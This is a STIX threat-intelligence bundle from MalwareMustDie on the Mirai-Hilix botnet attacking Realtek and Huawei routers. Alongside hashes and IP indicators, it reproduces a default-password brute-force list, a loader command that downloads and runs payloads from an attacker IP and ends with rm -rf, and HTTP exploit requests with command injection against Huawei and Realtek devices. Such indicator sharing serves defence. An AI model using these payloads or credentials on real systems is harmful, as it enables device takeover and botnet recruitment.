{ "type": "bundle", "id": "bundle--5ebd9f11-4628-4dc2-abaf-4d54950d210f", "objects": [ { "type": "identity", "spec_version": "2.1", "id": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T20:14:31.000Z", "modified": "2020-05-14T20:14:31.000Z", "name": "MalwareMustDie", "identity_class": "organization" }, { "type": "report", "spec_version": "2.1", "id": "report--5ebd9f11-4628-4dc2-abaf-4d54950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T20:14:31.000Z", "modified": "2020-05-14T20:14:31.000Z", "name": "Linux/Mirai-Hilix (w/New TABLE encoder) aims Realtek & Huawei routers", "published": "2020-05-14T20:15:14Z", "object_refs": [ "observed-data--5ebda0e8-d424-4544-accb-4540950d210f", "url--5ebda0e8-d424-4544-accb-4540950d210f", "observed-data--5ebda0e8-733c-4f46-a368-4b7e950d210f", "url--5ebda0e8-733c-4f46-a368-4b7e950d210f", "observed-data--5ebda0e8-c404-4fa2-a2ba-48a0950d210f", "url--5ebda0e8-c404-4fa2-a2ba-48a0950d210f", "observed-data--5ebda0e8-b39c-4e34-8fde-48f7950d210f", "url--5ebda0e8-b39c-4e34-8fde-48f7950d210f", "observed-data--5ebda19c-1004-4b99-af52-4bcb950d210f", "file--5ebda19c-1004-4b99-af52-4bcb950d210f", "observed-data--5ebda19d-5838-41fe-a455-481a950d210f", "file--5ebda19d-5838-41fe-a455-481a950d210f", "observed-data--5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f", "file--5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f", "observed-data--5ebda19d-39e8-459b-8128-458e950d210f", "file--5ebda19d-39e8-459b-8128-458e950d210f", "observed-data--5ebda19d-ea98-4dd8-bda1-4847950d210f", "file--5ebda19d-ea98-4dd8-bda1-4847950d210f", "observed-data--5ebda19d-60e0-4e0c-a372-45c1950d210f", "file--5ebda19d-60e0-4e0c-a372-45c1950d210f", "observed-data--5ebda19d-71f4-4308-baa0-4fe2950d210f", "file--5ebda19d-71f4-4308-baa0-4fe2950d210f", "observed-data--5ebda214-8710-467a-aa11-4de1950d210f", "file--5ebda214-8710-467a-aa11-4de1950d210f", "observed-data--5ebda214-08f8-4218-bc78-42a6950d210f", "file--5ebda214-08f8-4218-bc78-42a6950d210f", "observed-data--5ebda214-89a0-452e-8f30-4874950d210f", "file--5ebda214-89a0-452e-8f30-4874950d210f", "observed-data--5ebda214-02e4-4f15-8e44-4feb950d210f", "file--5ebda214-02e4-4f15-8e44-4feb950d210f", "observed-data--5ebda214-b6e4-4cf5-a789-46a7950d210f", "file--5ebda214-b6e4-4cf5-a789-46a7950d210f", "observed-data--5ebda2f3-d320-4e88-b43c-4c03950d210f", "network-traffic--5ebda2f3-d320-4e88-b43c-4c03950d210f", "ipv4-addr--5ebda2f3-d320-4e88-b43c-4c03950d210f", "observed-data--5ebda2f3-d174-41d1-a36e-44cb950d210f", "network-traffic--5ebda2f3-d174-41d1-a36e-44cb950d210f", "ipv4-addr--5ebda2f3-d174-41d1-a36e-44cb950d210f", "observed-data--5ebda2f3-d6a4-495a-a6c3-40b1950d210f", "network-traffic--5ebda2f3-d6a4-495a-a6c3-40b1950d210f", "ipv4-addr--5ebda2f3-d6a4-495a-a6c3-40b1950d210f", "observed-data--5ebda2f4-5bdc-49d3-bd46-4829950d210f", "network-traffic--5ebda2f4-5bdc-49d3-bd46-4829950d210f", "ipv4-addr--5ebda2f4-5bdc-49d3-bd46-4829950d210f", "x-misp-attribute--5ebda3c1-a0e4-41db-a6a5-43ee950d210f", "x-misp-attribute--5ebda451-d9f4-47c6-b3d5-4ce5950d210f", "x-misp-attribute--5ebda510-e6b4-49ac-b728-422c950d210f", "x-misp-attribute--5ebda63b-a5b4-4b74-9ca1-4130950d210f" ], "labels": [ "Threat-Report", "misp:tool=\"MISP-STIX-Converter\"", "circl:incident-classification=\"malware\"", "malware_classification:malware-category=\"Botnet\"", "Mirai" ], "object_marking_refs": [ "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9" ] }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda0e8-d424-4544-accb-4540950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:50:00.000Z", "modified": "2020-05-14T19:50:00.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "url--5ebda0e8-d424-4544-accb-4540950d210f" ], "labels": [ "misp:type=\"link\"", "misp:category=\"Internal reference\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5ebda0e8-d424-4544-accb-4540950d210f", "value": "https://www.virustotal.com/gui/file/a7f3670b9720fd2092d0cd0f52b46fecd431d442a9bff6ec8839e854147b7c53/community" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda0e8-733c-4f46-a368-4b7e950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:50:00.000Z", "modified": "2020-05-14T19:50:00.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "url--5ebda0e8-733c-4f46-a368-4b7e950d210f" ], "labels": [ "misp:type=\"link\"", "misp:category=\"Internal reference\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5ebda0e8-733c-4f46-a368-4b7e950d210f", "value": "https://old.reddit.com/r/LinuxMalware/comments/gj1x02/linuxmirai_hilix/" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda0e8-c404-4fa2-a2ba-48a0950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:50:00.000Z", "modified": "2020-05-14T19:50:00.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "url--5ebda0e8-c404-4fa2-a2ba-48a0950d210f" ], "labels": [ "misp:type=\"link\"", "misp:category=\"Internal reference\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5ebda0e8-c404-4fa2-a2ba-48a0950d210f", "value": "https://imgur.com/a/lWbs6T1" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda0e8-b39c-4e34-8fde-48f7950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:50:00.000Z", "modified": "2020-05-14T19:50:00.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "url--5ebda0e8-b39c-4e34-8fde-48f7950d210f" ], "labels": [ "misp:type=\"link\"", "misp:category=\"Internal reference\"" ] }, { "type": "url", "spec_version": "2.1", "id": "url--5ebda0e8-b39c-4e34-8fde-48f7950d210f", "value": "https://twitter.com/malwaremustd1e/status/1260582039503417344" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda19c-1004-4b99-af52-4bcb950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:53:00.000Z", "modified": "2020-05-14T19:53:00.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda19c-1004-4b99-af52-4bcb950d210f" ], "labels": [ "misp:type=\"md5\"", "misp:category=\"Payload installation\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda19c-1004-4b99-af52-4bcb950d210f", "hashes": { "MD5": "7a5e717aa86fd986d9aef089c6e07bcd" } }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda19d-5838-41fe-a455-481a950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:53:01.000Z", "modified": "2020-05-14T19:53:01.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda19d-5838-41fe-a455-481a950d210f" ], "labels": [ "misp:type=\"md5\"", "misp:category=\"Payload installation\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda19d-5838-41fe-a455-481a950d210f", "hashes": { "MD5": "8293c25c4c759654ea72342750a91170" } }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:53:01.000Z", "modified": "2020-05-14T19:53:01.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f" ], "labels": [ "misp:type=\"md5\"", "misp:category=\"Payload installation\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda19d-ffb8-4c9f-a0a5-4f0c950d210f", "hashes": { "MD5": "94008c192bd62432fbacede828e2c497" } }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda19d-39e8-459b-8128-458e950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:53:01.000Z", "modified": "2020-05-14T19:53:01.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda19d-39e8-459b-8128-458e950d210f" ], "labels": [ "misp:type=\"md5\"", "misp:category=\"Payload installation\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda19d-39e8-459b-8128-458e950d210f", "hashes": { "MD5": "749d282b6ff9e1b9390201173af694c0" } }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda19d-ea98-4dd8-bda1-4847950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:53:01.000Z", "modified": "2020-05-14T19:53:01.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda19d-ea98-4dd8-bda1-4847950d210f" ], "labels": [ "misp:type=\"md5\"", "misp:category=\"Payload installation\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda19d-ea98-4dd8-bda1-4847950d210f", "hashes": { "MD5": "34307f52ba4a81d94058c130df146c5a" } }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda19d-60e0-4e0c-a372-45c1950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:53:01.000Z", "modified": "2020-05-14T19:53:01.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda19d-60e0-4e0c-a372-45c1950d210f" ], "labels": [ "misp:type=\"md5\"", "misp:category=\"Payload installation\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda19d-60e0-4e0c-a372-45c1950d210f", "hashes": { "MD5": "84d45afab65260068009911871f5babd" } }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda19d-71f4-4308-baa0-4fe2950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:53:01.000Z", "modified": "2020-05-14T19:53:01.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda19d-71f4-4308-baa0-4fe2950d210f" ], "labels": [ "misp:type=\"md5\"", "misp:category=\"Payload installation\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda19d-71f4-4308-baa0-4fe2950d210f", "hashes": { "MD5": "ec413215dc385d95e1c89d9bda44de4d" } }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda214-8710-467a-aa11-4de1950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:55:00.000Z", "modified": "2020-05-14T19:55:00.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda214-8710-467a-aa11-4de1950d210f" ], "labels": [ "misp:type=\"filename\"", "misp:category=\"Payload delivery\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda214-8710-467a-aa11-4de1950d210f", "name": "Hilix.sh" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda214-08f8-4218-bc78-42a6950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:55:00.000Z", "modified": "2020-05-14T19:55:00.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda214-08f8-4218-bc78-42a6950d210f" ], "labels": [ "misp:type=\"filename\"", "misp:category=\"Payload delivery\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda214-08f8-4218-bc78-42a6950d210f", "name": "Hilix1.sh" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda214-89a0-452e-8f30-4874950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:55:00.000Z", "modified": "2020-05-14T19:55:00.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda214-89a0-452e-8f30-4874950d210f" ], "labels": [ "misp:type=\"filename\"", "misp:category=\"Payload delivery\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda214-89a0-452e-8f30-4874950d210f", "name": "Hilix2.sh" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda214-02e4-4f15-8e44-4feb950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:55:00.000Z", "modified": "2020-05-14T19:55:00.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda214-02e4-4f15-8e44-4feb950d210f" ], "labels": [ "misp:type=\"filename\"", "misp:category=\"Payload delivery\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda214-02e4-4f15-8e44-4feb950d210f", "name": "Hilix3.sh" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda214-b6e4-4cf5-a789-46a7950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:55:00.000Z", "modified": "2020-05-14T19:55:00.000Z", "first_observed": "2020-05-12T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "file--5ebda214-b6e4-4cf5-a789-46a7950d210f" ], "labels": [ "misp:type=\"filename\"", "misp:category=\"Payload delivery\"" ] }, { "type": "file", "spec_version": "2.1", "id": "file--5ebda214-b6e4-4cf5-a789-46a7950d210f", "name": "Hilix4.sh" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda2f3-d320-4e88-b43c-4c03950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:58:43.000Z", "modified": "2020-05-14T19:58:43.000Z", "first_observed": "2020-05-13T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "network-traffic--5ebda2f3-d320-4e88-b43c-4c03950d210f", "ipv4-addr--5ebda2f3-d320-4e88-b43c-4c03950d210f" ], "labels": [ "misp:type=\"ip-src\"", "misp:category=\"Payload delivery\"" ] }, { "type": "network-traffic", "spec_version": "2.1", "id": "network-traffic--5ebda2f3-d320-4e88-b43c-4c03950d210f", "src_ref": "ipv4-addr--5ebda2f3-d320-4e88-b43c-4c03950d210f", "protocols": [ "tcp" ] }, { "type": "ipv4-addr", "spec_version": "2.1", "id": "ipv4-addr--5ebda2f3-d320-4e88-b43c-4c03950d210f", "value": "142.93.217.221" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda2f3-d174-41d1-a36e-44cb950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:58:43.000Z", "modified": "2020-05-14T19:58:43.000Z", "first_observed": "2020-05-13T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "network-traffic--5ebda2f3-d174-41d1-a36e-44cb950d210f", "ipv4-addr--5ebda2f3-d174-41d1-a36e-44cb950d210f" ], "labels": [ "misp:type=\"ip-src\"", "misp:category=\"Payload delivery\"" ] }, { "type": "network-traffic", "spec_version": "2.1", "id": "network-traffic--5ebda2f3-d174-41d1-a36e-44cb950d210f", "src_ref": "ipv4-addr--5ebda2f3-d174-41d1-a36e-44cb950d210f", "protocols": [ "tcp" ] }, { "type": "ipv4-addr", "spec_version": "2.1", "id": "ipv4-addr--5ebda2f3-d174-41d1-a36e-44cb950d210f", "value": "159.203.44.33" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda2f3-d6a4-495a-a6c3-40b1950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:58:43.000Z", "modified": "2020-05-14T19:58:43.000Z", "first_observed": "2020-05-13T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "network-traffic--5ebda2f3-d6a4-495a-a6c3-40b1950d210f", "ipv4-addr--5ebda2f3-d6a4-495a-a6c3-40b1950d210f" ], "labels": [ "misp:type=\"ip-src\"", "misp:category=\"Payload delivery\"" ] }, { "type": "network-traffic", "spec_version": "2.1", "id": "network-traffic--5ebda2f3-d6a4-495a-a6c3-40b1950d210f", "src_ref": "ipv4-addr--5ebda2f3-d6a4-495a-a6c3-40b1950d210f", "protocols": [ "tcp" ] }, { "type": "ipv4-addr", "spec_version": "2.1", "id": "ipv4-addr--5ebda2f3-d6a4-495a-a6c3-40b1950d210f", "value": "194.180.224.124" }, { "type": "observed-data", "spec_version": "2.1", "id": "observed-data--5ebda2f4-5bdc-49d3-bd46-4829950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T19:58:44.000Z", "modified": "2020-05-14T19:58:44.000Z", "first_observed": "2020-05-13T00:00:00Z", "last_observed": "2020-05-15T00:00:00Z", "number_observed": 1, "object_refs": [ "network-traffic--5ebda2f4-5bdc-49d3-bd46-4829950d210f", "ipv4-addr--5ebda2f4-5bdc-49d3-bd46-4829950d210f" ], "labels": [ "misp:type=\"ip-src\"", "misp:category=\"Payload delivery\"" ] }, { "type": "network-traffic", "spec_version": "2.1", "id": "network-traffic--5ebda2f4-5bdc-49d3-bd46-4829950d210f", "src_ref": "ipv4-addr--5ebda2f4-5bdc-49d3-bd46-4829950d210f", "protocols": [ "tcp" ] }, { "type": "ipv4-addr", "spec_version": "2.1", "id": "ipv4-addr--5ebda2f4-5bdc-49d3-bd46-4829950d210f", "value": "194.180.224.150" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ebda3c1-a0e4-41db-a6a5-43ee950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T20:02:09.000Z", "modified": "2020-05-14T20:02:09.000Z", "labels": [ "misp:type=\"comment\"", "misp:category=\"Targeting data\"" ], "x_misp_category": "Targeting data", "x_misp_comment": "Linux/Mirai Hilix targeted products (telnet default password)", "x_misp_type": "comment", "x_misp_value": "\"root\",\"xc3511\"\r\n\"root\",\"xc3518\"\r\n\"root\",\"xc3515\"\r\n\"vstarcam2015\",\"20150602\"\r\n\"admin\",\"admin\"\r\n\"root\",\"zte9x15\"\r\n\"root\",\"vizxv\"\r\n\"root\",\"admin\"\r\n\"root\",\"vertex25ektks123\"\r\n\"admin\",\"vertex25ektks123\"\r\n\"root\",\"Zte521\"\r\n\"default\"\r\n\"default\",\"OxhlwSG8\"\r\n\"default\",\"S2fGqNFs\"\r\n\"default\",\"lJwpbo6\"\r\n\"default\",\"antslq\"\r\n\"guest\",\"xc3511\"\r\n\"admin\",\"aquario\"\r\n\"support\",\"support\"\r\n\"admin\",\"password\"\r\n\"user\",\"user\"\r\n\"admin\",\"admin1234\"\r\n\"admin\",\"1111\"\r\n\"guest\",\"guest\"\r\n\"guest\",\"12345\"\r\n\"admin\",\"1234\"\r\n\"admin\",\"ipcam_rt5350\"\r\n\"root\",\"ipcam_rt5350\"\r\n\"admin\",\"ho4uku6at\"\r\n\"admin\",\"kont2004\"\r\n\"admin\",\"Win1doW$ \"\r\n\"root\",\"hunt5759\"\r\n\"admin\",\"COadmin123\"\r\n\"admin\",\"ZmqVfoSIP\"\r\n\"root\",\"3ep5w2u\"" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ebda451-d9f4-47c6-b3d5-4ce5950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T20:04:33.000Z", "modified": "2020-05-14T20:04:33.000Z", "labels": [ "misp:type=\"comment\"", "misp:category=\"Payload installation\"" ], "x_misp_category": "Payload installation", "x_misp_comment": "Linux/Mirai Hilix loader script injection (bruteforce default password)", "x_misp_type": "comment", "x_misp_value": "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.124/Hilix.sh; curl -O http://194.180.224.124/Hilix.sh; chmod 777 Hilix.sh; sh Hilix.sh; tftp 194.180.224.124 -c get Hilix3.sh; chmod 777 Hilix3.sh; sh Hilix3.sh; tftp -r Hilix2.sh -g 194.180.224.124; chmod 777 Hilix2.sh; sh Hilix2.sh; ftpget -v -u anonymous -p anonymous -P 21 194.180.224.124 Hilix1.sh Hilix1.sh; sh Hilix1.sh; rm -rf Hilix.sh Hilix3.sh Hilix2.sh Hilix1.sh; rm -rf *; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://194.180.224.124/bins/Hilix.x86 -O /tmp/Hilix; chmod +x /tmp/Hilix; /tmp/Hilix sbot.x86" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ebda510-e6b4-49ac-b728-422c950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T20:07:44.000Z", "modified": "2020-05-14T20:07:44.000Z", "labels": [ "misp:type=\"comment\"", "misp:category=\"Payload delivery\"" ], "x_misp_category": "Payload delivery", "x_misp_comment": "Linux/Mirai Hilix loader's infection script injection (Realtek, Huawei routers vulnerabilities)", "x_misp_type": "comment", "x_misp_value": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\\r\\nContent-Length: 430\\r\\nConnection: keep-alive\\r\\nAccept: */\u00ef\u00bc\u0160\\r\\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\\r\\n\\r\\n$(/bin/busybox wget -g 159.203.44.33 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)$(echo HUAWEIUPNP)\\r\\n\\r\\n\r\n\r\nPOST /picdesc.xml HTTP/1.1\\r\\nHost: 127.0.0.1:52869\\r\\nContent-Length: 630\\r\\nAccept-Encoding: gzip, deflate\\r\\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\\r\\nAccept: */*\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\r\\nConnection: keep-alive\\r\\n\\r\\n47451TCP44382`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`1syncthing0\\r\\n\\r\\n\r\n\r\n\r\nPOST /wanipcn.xml HTTP/1.1\\r\\nHost: 127.0.0.1:52869\\r\\nContent-Length: 630\\r\\nAccept-Encoding: gzip, deflate\\r\\nSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\\r\\nAccept: */*\\r\\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\\r\\nConnection: keep-alive\\r\\n\\r\\n47451TCP44382`cd /var; rm -rf nig; wget http://159.203.44.33/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`1syncthing0\\r\\n\\r\\n" }, { "type": "x-misp-attribute", "spec_version": "2.1", "id": "x-misp-attribute--5ebda63b-a5b4-4b74-9ca1-4130950d210f", "created_by_ref": "identity--569e04b2-efd0-45bd-b83a-4f7b950d210f", "created": "2020-05-14T20:12:43.000Z", "modified": "2020-05-14T20:12:43.000Z", "labels": [ "misp:type=\"comment\"", "misp:category=\"Network activity\"" ], "x_misp_category": "Network activity", "x_misp_comment": "Linux/Mirai Hilix DDoS attack methods", "x_misp_type": "comment", "x_misp_value": "attack_method_greip\r\nattack_method_greeth\r\nattack_method_std\r\nattack_method_tcpsyn\r\nattack_method_tcpack\r\nattack_method_tcpstomp\r\nattack_method_tcpxmas\r\nattack_method_udpgeneric\r\nattack_method_udpvse\r\nattack_method_udpdns\r\nattack_method_udpplain" }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } } ] }